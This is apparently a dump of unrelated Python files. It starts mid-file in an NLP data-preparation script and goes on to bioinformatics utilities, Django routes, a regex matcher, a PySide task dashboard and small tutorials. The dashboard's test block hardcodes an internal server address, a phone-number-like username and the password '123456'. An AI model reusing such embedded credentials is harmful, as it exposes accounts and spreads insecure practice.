data_point_counts.setdefault(sentence_categories[grouped_sentence],0) + 1
train_source.write(sample_text + " |SEN| " + train_input + "\n")
train_target.write(train_output + "\n")
for entity_terms,entity_closest in zip([food_names,nutr_names,cond_names],\
[food_closest,nutr_closest,cond_closest]):
for entity_term in entity_terms:
entity_closests = entity_closest[entity_term][:\
multiplier[sentence_categories[grouped_sentence]]]
for entity_clos in entity_closests:
sample_text = random.choice(categorized_sentences[\
sentence_categories[grouped_sentence]])
n_train_input = train_input.replace(entity_term,entity_clos)
n_train_output= train_output.replace(entity_term,entity_clos)
if len(sample_text.split())+len(n_train_input.split())+len(n_train_output.split()) > 220:
continue
train_source.write(sample_text + " |SEP| " +\
n_train_input + "\n")
train_target.write(n_train_output + "\n")
data_point_counts[sentence_categories[grouped_sentence]] =\
data_point_counts.setdefault(sentence_categories[grouped_sentence],0) + 1
train_source.close()
train_target.close()
print(number_of_good_sentences)
print(category_counts)
print(good_category_counts)
print(data_point_counts)
pubmed_causes = pickle.load(open("pubmed_causes.p","rb"))
test_cat_counts = {}
cluster_extractive_multi_summaries = jsonlines.open(\
"cluster_extractive_multi_summaries.jsonl","r")
input_cluster_text = open("multi_test.source","w")
pubmed_multi_test = open("multi_test.pubmed","w")
metadata = json.load(open("annotated_metadata5.json","r"))
for data_point in cluster_extractive_multi_summaries:
file_name = data_point['file_name']
pubmed_sentences = metadata[file_name]['pubmed_sentences']
pubmed_titles = {}
pubmed_title_representations = {}
cluster_sentences = data_point['clustered_sentences']
cluster_numbers = data_point['cluster_numbers']
current_pubmeds = list(set(sum(sentences_pubmeds\
[tuple(data_point['gold'][0])],[])))
ignore_instance = False
for cluster_sentence in cluster_sentences:
if cluster_sentence[0][-3] not in current_pubmeds:
ignore_instance = True
break
if ignore_instance:
continue
current_causes = []
for pubmed in current_pubmeds:
for p_c in pubmed_causes.get(pubmed,[]):
current_causes.append(p_c + [pubmed])
for pubmed in current_pubmeds:
pubmed_titles[pubmed] = " ".join(pubmed_sentences[pubmed]\
[0][0]).strip()
pubmed_title_representations[pubmed] = _get_entity_embeddings(\
pubmed_titles[pubmed],embeddings)
is_cont = False
for i,current_cause1 in enumerate(current_causes):
for j,current_cause2 in enumerate(current_causes):
if current_cause1[-1] == current_cause2[-1]:
continue
if current_cause1[:2] == current_cause2[:2] and \
current_cause1[2] != current_cause2[2]:
is_cont = True
cluster_sentences = [[current_cause1,"",""],\
[current_cause2,"",""]]
break
if is_cont:
break
food_name = data_point['food_name']
category_name = 'certain'
if is_cont:
category_name = 'contradiction'
candidate_titles = []
for cause in cluster_sentences:
candidate_titles.append(pubmed_title_representations.get(\
cause[0][-3],np.array([0]*50)))
cluster_pubmeds = {}
for pubmed in current_pubmeds:
pubmed_repr = pubmed_title_representations.get(\
pubmed,np.array([0]*50))
dot_products= [np.dot(pubmed_repr,p) for p in candidate_titles]
best_index = dot_products.index(max(dot_products))
cluster_pubmeds[best_index] = cluster_pubmeds.setdefault(best_index,[]) + [pubmed]
clusters_pubmeds_list = []
for ind in range(len(cluster_sentences)):
clusters_pubmeds_list.append(cluster_pubmeds.get(ind,[]))
pubmed_multi_test.write(str(clusters_pubmeds_list) + "\n")
sample_text = random.choice(categorized_sentences[category_name])
test_cat_counts[category_name] = test_cat_counts.setdefault(\
category_name,0) + 1
net_input = []
for cluster_sentence in cluster_sentences:
sent = cluster_sentence[0]
if food_name != "":
sent[0] = food_name
curr_input = "<blank> " + sent[0] + " <" + sent[2].split()[0] + "> " + sent[1] + " <blank>"
net_input.append(curr_input)
input_text = " |SEN| ".join(net_input).strip()
input_cluster_text.write(sample_text + " |SEP| " + input_text + "\n")
input_cluster_text.close()
pubmed_multi_test.close()
print(test_cat_counts)
if __name__ == "__main__":
data = json.load(open("annotated_metadata5.json","r"))
#gather_multi_sentence_summaries(data)
#import sys; sys.exit()
#a_summaries = analyse_insufficient(data,[])
#output_scoping_summaries = analyse_scoping(data,\
# set(a_summaries))
#c_summaries = analyse_contradictions(data, \
# set(output_scoping_summaries+a_summaries))
#certain_summaries = certain_results(data, set(output_scoping_summaries\
# +c_summaries+a_summaries))
#dictionary_outputs= {'contradiction':c_summaries,'not_enough':a_summaries,\
# 'certain':certain_summaries,'scoping':output_scoping_summaries}
#pickle.dump(dictionary_outputs,open("categorized_output_summaries.p","wb"))
#input_contradictions(data)
ne_summaries = input_not_enough(data,[])
scoping_summaries = input_scoping(data,set(ne_summaries))
contradiction_summaries = input_contradictions(data,\
set(ne_summaries+scoping_summaries))
certain_summaries = input_certain(data, set(ne_summaries+\
scoping_summaries+contradiction_summaries))
print(len(ne_summaries),len(scoping_summaries),\
len(contradiction_summaries),len(certain_summaries))
print(len(set(ne_summaries+scoping_summaries+contradiction_summaries)))
dict = {'not_enough':ne_summaries, 'scoping':scoping_summaries,\
'contradiction':contradiction_summaries, \
'certain':certain_summaries}
pickle.dump(dict,open("new_categorized_input_summaries.p","wb"))
import sys; sys.exit()
get_sentence_annotations()
check_outputs("train_expanded.source",
"/data/rsg/nlp/darsh/MatrixEmbedding/fairseq/infilling-categorized-bin/train.hypo",
"train.source8",
"train.target8")
check_pubmed_outputs(data)
|
from functions import isPrime, isPadnigital
def same_digits(n):
for i in str(n):
if str(n).count(i)>1:
return True
return False
def main():
for i in range(10001,10000000,2):
if not same_digits(i) and i%10!=0:
if isPrime(i) and isPadnigital(i):
print(i)
if __name__=='__main__':
main()
|
#! /usr/local/bin/python
#! -*- encoding:utf-8 -*-
from pathlib import Path
import pandas as pd
import numpy as np
import random
import os
def generate_gt(clusters, dataset):
cci_labels_gt_path = '{}/mouse_small_intestine_1189_cci_labels_gt_{}_{}.csv'
cci_labels_junk_path = '{}/mouse_small_intestine_1189_cci_labels_junk_{}_{}.csv'
data_path = 'mouse_small_intestine_1189_data.csv'
type_path = 'mouse_small_intestine_1189_cellcluster.csv'
cci_path = 'mouse_small_intestine_1189_cluster_cluster_interaction_combined.csv'
ligand_receptor_pair_path = 'mouse_ligand_receptor_pair.csv'
# prepare data and cell2type
df = pd.read_csv(data_path, index_col=0) # (gene, cell)
df = df.fillna(0)
df = df.transpose(copy=True) # (cell, gene)
df['id'] = range(0, len(df)) # add cell id
df['id'].astype(int)
cell2type = pd.read_csv(type_path, index_col=0)
cell2type.columns = ['cell', 'type']
assert cell2type['cell'].tolist() == df.index.tolist()
df['type'] = cell2type['type'].tolist()
# prepare cell cell interaction
cci = pd.read_csv(cci_path, header=0, index_col=0)
# prepare ligand receptor pair
lcp = pd.read_csv(ligand_receptor_pair_path, header=0, index_col=0)
ligand = lcp['ligand'].tolist()
receptor = lcp['receptor'].tolist()
pair1_mask = ligand + receptor
pair2_mask = receptor + ligand
mp = dict()
for m in range(len(cci)):
id1 = cci.iloc[m]['cluster1']
id2 = cci.iloc[m]['cluster2']
if (id1 not in clusters) or (id2 not in clusters):
continue
print(f'cluster: {id1}, {id2}')
df1 = df[df['type'] == id1]
df2 = df[df['type'] == id2]
print(f'total pairs: {len(df1)*len(df2)}')
# assert len(df1) > 0, f"the cluster {id1} doesn't appear in the dataset."
# assert len(df2) > 0, f"the cluster {id2} doesn't appear in the dataset."
cur_cci = []
cur_cci_junk = []
for i in range(len(df1)):
for j in range(len(df2)):
pair1 = df1.iloc[i][pair1_mask].fillna(0)
pair1.index = list(range(len(pair1)))
pair2 = df2.iloc[j][pair2_mask].fillna(0)
pair2.index = list(range(len(pair2)))
pair = pd.concat([pair1, pair2], 1)
flag = False
for k in range(len(pair)):
if pair.iloc[k][0] > 0 and pair.iloc[k][1] > 0:
cur_cci.append([df1.iloc[i]['id'], df2.iloc[j]['id'], 1])
mp[df1.iloc[i]['id']] = df2.iloc[j]['id']
flag = True
break
if not flag and df1.iloc[i]['id'] not in mp:
cur_cci_junk.append([df1.iloc[i]['id'], df2.iloc[j]['id'], 0])
with open(cci_labels_gt_path.format(dataset, id1, id2), 'w', encoding='utf-8') as f:
print(f"cur cci {len(cur_cci)}")
for cci_label in cur_cci:
f.write(f"{int(cci_label[0])},{int(cci_label[1])},{int(cci_label[2])}\r\n")
with open(cci_labels_junk_path.format(dataset, id1, id2), 'w', encoding='utf-8') as f:
print(f"cur cci junk {len(cur_cci_junk)}")
for cci_label in cur_cci_junk:
f.write(f"{int(cci_label[0])},{int(cci_label[1])},{int(cci_label[2])}\r\n")
def generate_junk(clusters, dataset):
dir_path = Path(os.getcwd())
dataset_path = dir_path / dataset
data_files = dataset_path.glob('*gt*.csv')
mp = dict()
for file in data_files:
print(file)
with open(str(file), 'r', encoding='utf-8') as f:
for line in f.readlines():
tri = line.strip().split(',')
if int(tri[0]) not in mp:
mp[int(tri[0])] = set()
mp[int(tri[0])].add(int(tri[1]))
data_path = 'mouse_small_intestine_1189_data.csv'
df = pd.read_csv(data_path, index_col=0) # (gene, cell)
df = df.fillna(0)
df = df.transpose(copy=True) # (cell, gene)
df['id'] = range(0, len(df)) # add cell id
df['id'].astype(int)
cur_cci_junk = []
for i in range(len(df)):
if i > 0:
break
for j in range(i+1, len(df)):
if i in mp and j in mp[i]:
continue
else:
cur_cci_junk.append([i, j, 0])
print(f'total junk: {len(cur_cci_junk)}')
cci_labels_junk_path = '{}/mouse_small_intestine_1189_cci_labels_junk.csv'
with open(cci_labels_junk_path.format(dataset), 'w', encoding='utf-8') as f:
print(f"cur cci junk {len(cur_cci_junk)}")
for cci_label in cur_cci_junk:
f.write(f"{int(cci_label[0])},{int(cci_label[1])},{int(cci_label[2])}\r\n")
if __name__ == "__main__":
import os
os.chdir('/Users/yryang/Desktop/code/cci/data/cell_cell_interaction/')
print(os.getcwd())
test_cluster = [5,6,10,11,12,15]
train_cluster = [1, 2,3,4,7,8,9,13,14,16,17,18,19]
# test_dataset
# generate_gt(test_cluster, dataset='test_dataset')
generate_junk(test_cluster, dataset='test_dataset')
# train_dataset
# generate_gt(train_cluster, dataset='train_dataset')
# generate_junk(train_cluster, dataset='train_dataset') |
# This script trys to avoid the following error message from Label:
# "Duplicate sequence number and insertion code."
# It only addresses waters for now since that's where I've seen
# the problem thus far and since numbering for waters is more arbitrary
# than for other molecules -- but it could easily be made more general.
# Actually, as of 11/25/13, I can't remember which cases actually had
# this problem -- but I do remember such cases existing...
import sys
def parse_line(line):
altconf = line[16:17]
restype = line[17:20]
chain = line[21:22]
resseq = int(line[22:26].strip())
icode = line[26:27]
return chain, resseq, icode, restype, altconf
# Figure out the max residue number per chain so we can know
# where to start incrementing from in the next step
max_resseqs = {} # chain --> int
f = open(sys.argv[1], "r")
lines = f.readlines()
f.close()
for line in lines:
if line.startswith("ATOM ") or line.startswith("HETATM"):
chain, resseq, icode, restype, altconf = parse_line(line)
if chain not in max_resseqs:
max_resseqs[chain] = resseq
elif resseq > max_resseqs[chain]:
max_resseqs[chain] = resseq
# Find combinations of residue number + insertion code that are duplicated
# within a chain, and immediately renumber them
chain_resseq_icodes = set()
prev_line_resseq = None
for line in lines:
if line.startswith("ATOM ") \
or line.startswith("HETATM") \
or line.startswith("ANISOU"):
chain, resseq, icode, restype, altconf = parse_line(line)
cri = (chain, resseq, icode)
if cri in chain_resseq_icodes and altconf == ' ' and restype == 'HOH':
# Duplicate water!
if line.startswith("ATOM ") or line.startswith("HETATM"):
new_max_resseq = max_resseqs[chain] + 1
max_resseqs[chain] = new_max_resseq
new_resseq = new_max_resseq
prev_line_resseq = new_max_resseq
elif line.startswith("ANISOU"):
# Assume previous line was ATOM or HETATM for same residue...
#print 'HOH %d' % prev_line_resseq
new_resseq = prev_line_resseq
new_line = line[0:22] + str(new_resseq).rjust(4) + line[26:]
print new_line ,
else:
# Unique (so far) ATOM/HETATM/ANISOU, or alt conf
print line ,
prev_line_resseq = resseq
if line.startswith("ATOM ") or line.startswith("HETATM"):
chain_resseq_icodes.add(cri)
else:
# Header or something
print line ,
|
import os
import subprocess
import sys
from napari._tests.utils import skip_on_win_ci
CREATE_VIEWER_SCRIPT = """
import numpy as np
import napari
v = napari.view_image(np.random.rand(512, 512))
"""
@skip_on_win_ci
def test_octree_import():
"""Test we can create a viewer with NAPARI_OCTREE."""
cmd = [sys.executable, '-c', CREATE_VIEWER_SCRIPT]
env = os.environ.copy()
env['NAPARI_OCTREE'] = '1'
env['NAPARI_CONFIG'] = '' # don't try to save config
subprocess.run(cmd, check=True, env=env)
|
from django.urls import path
from .apis import *
urlpatterns = [
path('auth/sign_in', SignInApi.as_view(), name='sign_in'),
path('users/<int:user_id>', UserDetailApi.as_view(), name='user_detail'),
path('users/update', UserUpdateApi.as_view(), name='user_update'),
path('users/<int:user_id>/deactivate', UserDeactivateApi.as_view(), name='user_deactivate'),
path('users/<int:user_id>/activate', UserActivateApi.as_view(), name='user_activate'),
path('users/change_password', UserChangePasswordApi.as_view(), name='user_change_password'),
path('users/req_reset_password', UserRequestResetPasswordApi.as_view(), name='user_req_reset_password'),
path('users/reset_password', UserResetPasswordApi.as_view(), name='user_reset_password'),
path('users/create', UserCreateApi.as_view(), name='create_user'),
path('users/sign_out', UserSignOutApi.as_view(), name='sign_out')
] |
from django.utils.translation import ugettext_lazy as _
from google.appengine.ext import db
from ragendja.auth.google_models import GoogleUserTraits
class User(GoogleUserTraits):
"""User class that provides support for Django and Google Accounts."""
user = db.UserProperty()
username = db.StringProperty(required=True, verbose_name=_('username'))
email = db.EmailProperty(verbose_name=_('e-mail address'))
first_name = db.StringProperty(verbose_name=_('first name'))
last_name = db.StringProperty(verbose_name=_('last name'))
@classmethod
def create_djangouser_for_user(cls, user):
django_user = cls(user=user, email=user.email(),
username=user.nickname())
django_user.put()
return django_user
|
import time
import numpy as np
# for python <3.6
from pylo import FallbackModuleNotFoundError
try:
import DigitalMicrograph as DM
except (FallbackModuleNotFoundError, ImportError) as e:
DM = None
# from .dm_camera import DMCamera
from pylo import loader
DMCamera = loader.getDeviceClass("Digital Micrograph Camera")
class _DMDummyCamera:
def PrepareForAcquire(self):
self.SetInserted(True)
def AcquireImage(self, exposure_time, binning_x=1, binning_y=1,
process_level=1, ccd_area_top=0, ccd_area_left=0,
ccd_area_bottom=4096, ccd_area_right=4096):
time.sleep(exposure_time)
data = np.random.random(((ccd_area_right - ccd_area_left) // binning_x,
(ccd_area_bottom - ccd_area_top) // binning_y))
time.sleep(0.1)
img = DM.CreateImage(data)
time.sleep(0.1)
return img
def IsRetractable(self):
return True
def SetInserted(self, inserted):
self.inserted = inserted
if not inserted:
try:
import DigitalMicrograph as DM
except Exception:
DM = None
text = "Camera {} is now retracted!".format(self.__class__.__name__)
if DM is not None:
DM.OkDialog(text)
else:
print(text)
class DMTestCamera(DMCamera):
def __init__(self, *args, **kwargs) -> None:
"""Create a new dm camera object.
Parameters
----------
controller : Controller
The controller
"""
super(DMTestCamera, self).__init__(*args, **kwargs)
self.camera = _DMDummyCamera()
@staticmethod
def defineConfigurationOptions(*args, **kwargs) -> None:
DMCamera.defineConfigurationOptions(*args, **kwargs) |
"""
Regular-expression matching by the Thompson construction.
Explained in C at http://swtch.com/~rsc/regexp/regexp1.html
This code follows the same interface as backtrack.py in this same
directory (except we dropped 'fail' as uninteresting). backtrack.py is
easier to follow but suffers exponential blowup on some regexes. Both
of these loop on nested stars like r'a**', though (as Thompson himself
pointed out in his paper). deriv.py OTOH should work in all cases, but
needs more code.
"""
def match(re, s):
states = set([re(accepting)])
for c in s:
states = set.union(*[state(c) for state in states])
return any('ACCEPT' in state(None) for state in states)
def lit(char):
return lambda state: lambda c: set([state]) if char == c else set()
accepting = lit(None)('ACCEPT')
empty = lambda state: state
def seq(re1, re2): return lambda state: re1(re2(state))
def alt(re1, re2):
def either(state):
state1, state2 = re1(state), re2(state)
return lambda c: state1(c) | state2(c)
return either
def many(re):
def re_star(state):
def loop(c): return state(c) | re_plus(c)
re_plus = re(loop)
return loop
return re_star
## match(empty, '')
#. True
## match(empty, 'A')
#. False
## match(lit('x'), '')
#. False
## match(lit('x'), 'y')
#. False
## match(lit('x'), 'x')
#. True
## match(lit('x'), 'xx')
#. False
## match(seq(lit('a'), lit('b')), '')
#. False
## match(seq(lit('a'), lit('b')), 'ab')
#. True
## match(alt(lit('a'), lit('b')), 'b')
#. True
## match(alt(lit('a'), lit('b')), 'a')
#. True
## match(alt(lit('a'), lit('b')), 'x')
#. False
## match(many(lit('a')), '')
#. True
## match(many(lit('a')), 'a')
#. True
## match(many(lit('a')), 'x')
#. False
## match(many(lit('a')), 'aa')
#. True
## match(many(lit('a')), 'ax')
#. False
## complicated = seq(many(alt(seq(lit('a'), lit('b')), seq(lit('a'), seq(lit('x'), lit('y'))))), lit('z'))
## match(complicated, '')
#. False
## match(complicated, 'z')
#. True
## match(complicated, 'abz')
#. True
## match(complicated, 'ababaxyab')
#. False
## match(complicated, 'ababaxyabz')
#. True
## match(complicated, 'ababaxyaxz')
#. False
# N.B. infinite recursion, like Thompson's original code:
### match(many(many(lit('x'))), 'xxxx')
# Had a bug: empty forced a match regardless of the continuation.
## match(seq(empty, lit('x')), '')
#. False
## match(seq(empty, lit('x')), 'x')
#. True
|
# _ * _ coding: utf-8 _ * _ #
# @Time :2020/7/23 17:22
# @FileName :workbench_wedget.py
# @Author :LiuYang
from PySide2 import QtWidgets
from PySide2 import QtCore
from PySide2 import QtGui
import dayu_widgets as dy
class WorkBench(QtWidgets.QFrame):
"""
个人工作台窗口
"""
def __init__(self):
super(WorkBench, self).__init__()
# self.setFixedSize(300, 600)
self.MainLayout = QtWidgets.QGridLayout(self)
self.warningButton = TaskInfoWidget(u"警告任务", 3)
self.feedbackButton = TaskInfoWidget(u"反馈任务", 2)
self.todayTaskButton = TaskInfoWidget(u"今日任务", 1)
self.weekTaskButton = TaskInfoWidget(u"本周任务", 0)
self.dailyTaskButton = TaskInfoWidget(u"审核任务", 0)
self.doneTaskButton = TaskInfoWidget(u"完成任务", 0)
self.MainLayout.addWidget(self.warningButton, 0, 0)
self.MainLayout.addWidget(self.feedbackButton, 0, 1)
self.MainLayout.addWidget(self.todayTaskButton, 1, 0)
self.MainLayout.addWidget(self.weekTaskButton, 1, 1)
self.MainLayout.addWidget(self.dailyTaskButton, 2, 0)
self.MainLayout.addWidget(self.doneTaskButton, 2, 1)
theme = dy.MTheme("dark")
theme.apply(self)
def set_data(self, data):
mapping = {"warning": self.warningButton,
"feedback": self.feedbackButton,
"today": self.todayTaskButton,
"this_week": self.weekTaskButton,
"daily": self.dailyTaskButton,
"done": self.doneTaskButton}
for key, values in data.items():
mapping[key].numLabel.setText(str(values))
class TaskInfoWidget(QtWidgets.QWidget):
warning_level = {3: "danger", 2: "warning", 1: "secondary", 0: "null"}
left_clicked = QtCore.Signal(str)
def __init__(self, name, level):
super(TaskInfoWidget, self).__init__()
self.MainLayout = QtWidgets.QVBoxLayout(self)
self.numLabel = dy.MLabel().h1()
self.numLabel.setAlignment(QtCore.Qt.AlignCenter)
self.nameLabel = QtWidgets.QLabel(name)
self.nameLabel.setAlignment(QtCore.Qt.AlignCenter)
self.numLabel.set_dayu_type(self.warning_level[level])
self.setup_ui()
self.set_style_sheet()
def setup_ui(self):
self.MainLayout.addWidget(self.numLabel)
self.MainLayout.addWidget(self.nameLabel)
def set_style_sheet(self):
self.nameLabel.setStyleSheet("color: #cccccc; \n font-size:16px '微软雅黑'")
def mousePressEvent(self, event):
if event.button() == QtCore.Qt.LeftButton:
print self.nameLabel.text()
self.left_clicked.emit(self.nameLabel.text())
if __name__ == "__main__":
import sys
sys.path.append("D:/SMWH_project/teamones_sdk")
from teamones_api import teamnoes
tm = teamnoes.TeamOnes(base_url="http://10.168.30.17:18101", username="18210589458", password="123456")
data = tm.task.get_personal_task_statistics()
app = QtWidgets.QApplication([])
log = WorkBench()
log.set_data(data)
log.show()
app.exec_()
|
x = 50
def func(x):
print(f"x is {x}")
# Local assignment on a global variable
x = "New value"
print(f"\nx is now - {x}")
return x
print(x)
x = func(x)
print(x)
|
import calendar as cal
print(cal.weekday(2018,3,3))
print(cal.monthrange(2018,3))
cc = cal.Calendar()
print(cc.getfirstweekday())
|
# commands/push.py
# Copyright (C) 2011-2014 Andrew Svetlov
# andrew.svetlov@gmail.com
#
# This module is part of BloggerTool and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
from textwrap import dedent
from .basecommand import BaseCommand
class PushCommand(BaseCommand):
NAME = 'push'
HELP = "Push html to remote server."
DESCR = dedent("""\
Push html to remote server.
""")
require_interactive = True
@classmethod
def fill_parser(cls, parser):
parser.add_argument('file', help="md file to link with")
parser.add_argument('--always', default=False, action='store_true',
help="Always regenerate html files")
def __init__(self, args):
self.file = args.file
self.always = args.always
def run(self):
config = self.config
post = config.post_by_path(self.file)
if not post:
self.log.error("MD file '%s' is not registered", self.file)
return
if not post.postid:
self.log.error("MD file '%s' has not pushed on server yet",
self.file)
return
post.refresh_html(self.always)
srv = config.info.remote()
rpost = srv.get_post(post.postid)
this = post.inner_html()
updated_rpost = rpost.set_content(this)
updated_rpost = updated_rpost.set_title(post.title)
updated_rpost = updated_rpost.set_labels(post.labels)
#updated_rpost = updated_rpost.set_link(post.link)
srv.update_post(updated_rpost)
self.log.info("Post %s updated", post.name)
post.published = rpost.published
post.updated = rpost.updated
post.changed = False
|
from django.http import HttpResponse
def check_answers(request):
ans = request.POST
if (ans['trigger_channel'] == request.session['trigger_channel'] and
ans['action_channel'] == request.session['action_channel'] and
ans['trigger_fn'] == request.session['trigger_fn'] and
ans['action_fn'] == request.session['action_fn']):
return HttpResponse("correct")
else:
return HttpResponse("incorrect")
|
import re
import sys
with open(sys.argv[1], 'r') as myfile:
data=myfile.read().replace('\n', '')
post_username = re.findall(r'\[.+?\]\s<(.+?)>', data)
user_frequency = dict()
for user in post_username:
user_frequency[user] = user_frequency.get(user, 0) + 1
print ("Users sorted alphabetically:")
print ("Frequency\t", "Username" )
for i in sorted(user_frequency):
print (user_frequency[i], "\t\t", i)
print ("\nUsers sorted by post frequency:")
print ("Frequency\t", "Username")
for i in sorted(user_frequency, key=user_frequency.get):
print (user_frequency[i], "\t\t", i)
print ("\nNumber of Posts:", len(post_username), "\n")
print ("Number of Users:", len(user_frequency), "\n")
|
import numpy as np
import pandas as pd
import matrix_factorization_utilities
# Load user ratings
raw_dataset_df = pd.read_csv('movie_ratings_data_set.csv')
# Load movie titles and genres
movies_df = pd.read_csv('movies.csv', index_col='movie_id')
# Convert the running list of user ratings into a matrix
ratings_df = pd.pivot_table(raw_dataset_df, index='user_id',
columns='movie_id',
aggfunc=np.max)
# Apply matrix factorization to find the latent features
U, M = matrix_factorization_utilities.low_rank_matrix_factorization(ratings_df.as_matrix(),
num_features=15,
regularization_amount=0.1)
# Find all predicted ratings by multiplying U and M matrices
predicted_ratings = np.dot(U, M)
print("Enter a user_id to get recommendations (Between 1 and 100):")
user_id_to_search = int(input())
print("Movies previously reviewed by user_id {}:".format(user_id_to_search))
# Match user input to the correct user id
reviewed_movies_df = raw_dataset_df[raw_dataset_df['user_id'] == user_id_to_search]
# Join this list of reviews with the movie df data frame so we can display the title of each movie
reviewed_movies_df = reviewed_movies_df.join(movies_df, on='movie_id')
print(reviewed_movies_df[['title', 'genre', 'value']])
# Note input() raises EOF error in python 2.7...use raw_input() instead
raw_input("Press enter to continue.")
print("Movies we will recommend:")
# Pull out the predicted ratings for this specific user
# Need to -1 because the array is zero indexed but the user IDs start at 1)
user_ratings = predicted_ratings[user_id_to_search - 1]
# Save the predicted rating for each movie back to the list of movies so its easier to print out
movies_df['rating'] = user_ratings
already_reviewed = reviewed_movies_df['movie_id']
recommended_df = movies_df[movies_df.index.isin(already_reviewed) == False]
recommended_df = recommended_df.sort_values(by=['rating'], ascending=False)
print(recommended_df[['title', 'genre', 'rating']].head(5))
|
# 分析法
# 从最大的可能开始填起
# 即对应有(1+3) * (1+3) = 16个全部 填 34~49
# 只有34填到每周中位数中才合乎要求,其它位置1~33可随便填 |
# imports
__author__ = 'DuyAnhPham'
|
#!/usr/bin/env python
"""
Generic script template to use to create shell scripts in python. This will
setup basic logging and with a -v flag will also log to the console.
"""
# Imports go here
import logging
import argparse
import os
SCRIPTDIR, SCRIPTNAME = os.path.split(os.path.abspath(__file__))
LOGFILE = os.path.join(SCRIPTDIR, (os.path.splitext(__file__)[0]+ '.log'))
if __name__ == '__main__':
# -v flag will turn on verbose logging
parser = argparse.ArgumentParser(description="PROGRAM DESCRIPTION")
parser.add_argument("-v", "--verbose", dest='verbose',
help="Turn on verbose logging", action='store_true',
default=False)
args = parser.parse_args()
# Always log to a file
log = logging.getLogger(__file__)
log.setLevel(logging.WARNING)
formatter = logging.Formatter('%(asctime)s - %(message)s')
fh = logging.FileHandler(LOGFILE)
fh.setFormatter(formatter)
log.addHandler(fh)
#Log to the screen if verbose is turned on.
if args.verbose:
log.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setFormatter(formatter)
log.addHandler(ch)
log.debug('debug message')
log.info('info message')
log.warn('warn message')
log.error('error message')
log.critical('critical message')
|
def get_integer(m):
my_integer = int(input(m) )
return my_integer
def get_string(m):
my_string = input(m)
return my_string
def add_name_age(N,A):
count = get_integer("How many people would you like to add to the list? -> ")
for i in range (0, count):
# get name and age to add to the list
name = get_string("Please enter a name: -> ")
age = get_integer("Please enter {}'s age: -> ".format(name))
N.append(name)
A.append(age)
print("."*50)
my_string = ("{}, age {} has been added to the list".format(name, age))
print(my_string)
print("."*50)
def review(N, A):
if len(N) == len(A):
for i in range(0, len(A)):
output = "{} is {} years old".format(N[i], A[i])
print(output)
print("." * 50)
else:
print("List one doesn't have same number of elements as list two")
def menu():
name = []
age = []
my_menu ='''
A: Add
B: Review
Q: Quit
'''
run = True
while run == True:
print(my_menu)
choice = get_string("Please select your option: -> ").upper()
print("."*50)
if choice == "A":
add_name_age(name, age)
elif choice == "B":
review(name, age)
elif choice == "Q":
print("Thank you!")
run = False
else:
print("Invalid entry")
#add_name_age()
menu()
|
"""
区域填充:
"""
import matplotlib.pyplot as plt
import numpy as np
import matplotlib.patches as mpaches
fig, ax = plt.subplots() # 这种方式可以同时返回Figure对象和axes对象
# 方法:生成圆
circle = mpaches.Circle(np.array([0.2, 0.2]), 0.03)
ax.add_patch(circle)
# 方法:生成矩形
rect = mpaches.Rectangle([0.1, 0.1], 0.05, 0.03, color='r')
ax.add_patch(rect)
# [0.1, 0.1]表示左下角的坐标,0.2表示宽,0.1表示高
# 方法:生成多边形
polygon = mpaches.RegularPolygon([0.225, 0.12], 5, 0.03, color='y')
ax.add_patch(polygon)
# 方法:椭圆生成的方法:
ellips = mpaches.Ellipse([0.125, 0.2], 0.03, 0.04)
ax.add_patch(ellips)
plt.axis('equal') # 表示x,y坐标轴刻度相等
ax.grid(alpha=0.3)
plt.show()
|
import os
import sys
import pickle
import fam
"""
all event counts aec: aec[model][generax_radius][event] = count
"""
def _save_all_event_counts(datadir, aec):
out = fam.get_event_counts_file(datadir)
with open(out, "w") as writer:
for model in aec:
for generax_radius in aec[model]:
writer.write(model + "|")
writer.write(str(generax_radius) + "|")
event_counts = aec[model][generax_radius]
l = []
for event in event_counts:
l.append(event + "=" + str(event_counts[event]))
writer.write(",".join(l))
writer.write("\n")
def _add_event_counts(aec, model, generax_radius, event_counts):
if (not model in aec):
aec[model] = {}
aec[model][generax_radius] = event_counts
def get_all_event_counts(datadir):
f = fam.get_event_counts_file(datadir)
aec = {}
if (not os.path.isfile(f)):
return aec
for line in open(f).readlines():
sp = line.split("|")
if (len(sp) < 3):
continue
model = sp[0]
generax_radius = int(sp[1])
event_counts = {}
for p in sp[2].split(","):
sp2 = p.split("=")
event_counts[sp2[0]] = int(sp2[1])
_add_event_counts(aec, model, generax_radius, event_counts)
return aec
"""
event_counts is a dictionnary event_label->count
for instance event_counts["T"] == 5 for 5 transfers
"""
def update_event_counts(datadir, model, generax_radius, event_counts):
aec = get_all_event_counts(datadir)
_add_event_counts(aec, model, generax_radius, event_counts)
_save_all_event_counts(datadir, aec)
def get_D_S(event_counts):
S = event_counts["S"] + event_counts["SL"]
D = event_counts["D"]
return float(D) / float(S)
def get_D_lf(event_counts):
D = event_counts["D"]
leaves = event_counts["Leaf"]
return float(D) / float(leaves)
def get_T_S(event_counts):
S = event_counts["S"] + event_counts["SL"]
T = event_counts["T"] + event_counts["TL"]
return float(T) / float(S)
def get_T_lf(event_counts):
T = event_counts["T"] + event_counts["TL"]
leaves = event_counts["Leaf"]
return float(T) / float(leaves)
def get_D_L(event_counts):
L = event_counts["TL"] + event_counts["SL"]
D = event_counts["D"]
return float(D)/float(L)
def print_event_counts_norm(aec):
if (aec == {}):
print("No event counts")
return
for model in aec:
for generax_radius in aec[model]:
toprint = "counts for model " + model
toprint += " and radius " + str(generax_radius)
toprint += "\n"
event_counts = aec[model][generax_radius]
D = float(event_counts["D"])
T = float(event_counts["T"])
S = float(event_counts["S"])
SL = float(event_counts["SL"])
LF = float(event_counts["Leaf"])
#for event in event_counts:
#toprint += " " + event + "\t= " + str(event_counts[event]) + "\n"
toprint += " lf\t= " + str(int(LF)) + "\n"
toprint += " D/lf\t= " + str(D/LF) + "\n"
toprint += " D/S\t= " + str(D/S) + "\n"
toprint += " D/(S+SL)= " + str(D/(S+SL)) + "\n"
toprint += " S/lf\t= " + str(S/LF) + "\n"
toprint += " SL/lf\t= " + str(SL/LF) + "\n"
toprint += " (S+SL)/lf= " + str((S+SL)/LF) + "\n"
toprint += " T/lf\t= " + str(T/LF) + "\n"
toprint += " T/S\t= " + str(T/S) + "\n"
toprint += " T/(S+SL)= " + str(T/(S+SL)) + "\n"
print(toprint)
def str2(s):
return "{:.2f}".format(s)
def print_event_freqs(aec):
if (aec == {}):
print("No event counts")
return
for model in aec:
for generax_radius in aec[model]:
toprint = "counts for model " + model
toprint += " and radius " + str(generax_radius)
toprint += "\n"
